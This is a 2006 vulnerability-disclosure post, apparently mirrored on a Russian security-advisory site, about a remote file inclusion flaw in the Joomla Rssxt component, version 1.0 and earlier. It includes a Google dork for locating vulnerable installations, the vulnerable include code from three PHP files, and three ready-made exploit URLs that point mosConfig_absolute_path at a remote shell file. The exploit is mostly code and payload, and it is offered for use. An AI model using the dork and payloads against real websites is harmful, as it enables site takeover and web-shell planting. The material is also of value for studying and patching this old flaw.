Уведомление о безопасности: Joomla Rssxt <= 1.0 Remote File Include Vulnerability

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)
  [SA21543] mail f/w system Mail Header Injection Vulnerability
  [SA21604] Drupal E-commerce Module Script Insertion Vulnerabilities
  [SA21603] Drupal Easylinks Module Script Insertion and SQL Injection
  [SA21584] Empire CMS "check_path"
File Inclusion Vulnerability

From: crackers_child_(at)_sibersavascilar.com <crackers_child_(at)_sibersavascilar.com>
Date: 21 августа 2006 г.
Subject: Joomla Rssxt <= 1.0 Remote File Include Vulnerability

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------

Title : Joomla Rssxt <= 1.0 Remote File Include Vulnerability

--------------------------------------------------------------------------------

#Author: Crackers_Child

#cont@ct: crackers_child@sibersavascilar.com

--------------------------------------------------------------------------------

Google Dorks : allinurl:"/com_rssxt/"

------------------------- -------------------------------------------------------

Download : http://mamboxchange.com/frs/shownotes.php?release_id=985

--------------------------------------------------------------------------------

Bug

in pinger.php

require("../../configuration.php");
require("../../classes/mambo.php");
require("../../includes/sef.php");
require("$mosConfig_absolute_path/administrator/components/com_rssxt/cla
ss.rssxt.php");
error_reporting(0);
require("../../includes/IXR_Library.inc.php");

---

in RPC.php

require("../../configuration.php");
require("$mosConfig_absolute_path/classes/mambo.php");
require("$mosConfig_absolute_path/includes/sef.php");
require("$mosConfig_absolute_path/administrator/components/com_rssxt/cla
ss.rssxt.php");
require("includes/blogger.php");
require("includes/metaweblog.php");
error_reporting(0);
require("$mosConfig_absolute_path/includes/IXR_Library.inc.
php");
--

rssxt.php

include($mosConfig_absolute_path.
"/components/com_rssxt/includes/feedcreator.class.php");
require_once( $mosConfig_absolute_path."/administrator/components/com_rssxt/class.rssxt.
php");

--------------------------------------------------------------------------------

Exploit:

http://www.site.com/joomla_path/components/com_rssxt/pinger.php?mosConfig_absolut
e_path=Shell.txt?

http://www.site.com/joomla_path/components/com_rssxt/RPC.php?mosConfig_absolute_p
ath=Shell.txt?

http://www.site.com/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute
_path=Shell.txt?

--------------------------------------------------------------------------------

greets:

All My Friends And SiberSavascilar.Com Members !

--------------------------------------------------------------------------------

--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------